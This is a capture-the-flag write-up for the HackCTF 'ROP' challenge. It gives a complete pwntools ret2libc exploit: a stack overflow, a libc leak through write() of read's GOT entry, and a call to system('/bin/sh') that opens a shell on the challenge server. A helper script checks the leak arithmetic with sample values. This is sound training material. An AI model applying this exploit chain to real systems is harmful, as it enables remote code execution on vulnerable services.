HackCTF - ROP

A plain ROP chain is all that is needed: leak a libc address through write(), return to main, then call system("/bin/sh").

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3021)
e = ELF('./rop')
libc = ELF('./libc.so.6')
#context.log_level = 'debug'

pppr = 0x08048509  # pop; pop; pop; ret gadget, cleans the three write() arguments

# stage 1: overwrite the saved return address and call write(0, got['read'], 4)
payload = b'A' * 140                # padding up to the saved return address
payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(0)                   # fd
payload += p32(e.got['read'])       # buf: GOT entry of read
payload += p32(4)                   # count
payload += p32(e.sym['main'])       # return to main for the second stage

r.sendline(payload)

leak = u32(r.recv(4))
log.info('leak : {}'.format(hex(leak)))

libc_base = leak - libc.sym['read']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# stage 2: system("/bin/sh")
payload = b'A' * 140
payload += p32(system)
payload += b'AAAA'                  # fake return address for system
payload += p32(binsh)

r.sendline(payload)

r.interactive()
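The script above trusts the four leaked bytes blindly. The following is an added example, not part of the original post and not the challenge's own code, that reproduces the leak arithmetic without pwntools and adds the sanity check a careful operator wants: libc is always mapped on a page boundary, so a computed base that is not 0x1000-aligned means the wrong bytes were read or a libc that does not match the remote one was used. The base address and symbol offsets are constructed sample values, not those of the page's libc.

```python
import struct

# Constructed sample values (assumptions for this example, not taken from the
# page's binary or libc): a fictitious libc base and symbol offsets.
SAMPLE_LIBC_BASE = 0xF7D3C000
SAMPLE_OFFSETS = {"read": 0x000D5AF0, "system": 0x0003ADA0, "binsh": 0x0015BA0B}


def p32(value):
    """Little-endian 32-bit pack, the same layout pwntools' p32 produces."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    """Unpack the first four bytes as a little-endian 32-bit integer (pwntools' u32)."""
    return struct.unpack("<I", data[:4])[0]


def libc_base_from_leak(leaked_addr, symbol_offset):
    """Derive the libc load address from a leaked GOT entry.

    The GOT holds the resolved address of the symbol, so base = leak - offset.
    Reject bases that are not page-aligned: that is the usual symptom of reading
    the wrong GOT slot or of using a libc build that differs from the target.
    """
    base = (leaked_addr - symbol_offset) & 0xFFFFFFFF
    if base & 0xFFF:
        raise ValueError(
            f"libc base {base:#x} is not page-aligned; leak or libc mismatch"
        )
    return base


def resolve(libc_base, offset):
    """Rebase a libc offset (symbol or string) onto the derived load address."""
    return (libc_base + offset) & 0xFFFFFFFF


def build_chain(padding, *words):
    """Concatenate padding bytes and packed 32-bit words, as the page's payload does."""
    return b"A" * padding + b"".join(p32(w) for w in words)


def word_at(payload, offset):
    """Read back the 32-bit word stored at a given byte offset of a payload."""
    return u32(payload[offset:offset + 4])


def demo():
    """Walk the leak through the checks with the constructed sample values."""
    # What the remote side would send back: the GOT entry of read, 4 bytes.
    leaked_bytes = p32(SAMPLE_LIBC_BASE + SAMPLE_OFFSETS["read"])
    leak = u32(leaked_bytes)
    base = libc_base_from_leak(leak, SAMPLE_OFFSETS["read"])
    system = resolve(base, SAMPLE_OFFSETS["system"])
    binsh = resolve(base, SAMPLE_OFFSETS["binsh"])
    return {"leak": leak, "base": base, "system": system, "binsh": binsh}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>6}: {value:#010x}")
```

The alignment check costs nothing and turns a silent wrong guess (a chain that segfaults with no explanation) into an immediate, readable failure; `build_chain` and `word_at` let you confirm that a given value really lands at byte offset 140 before anything is sent.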
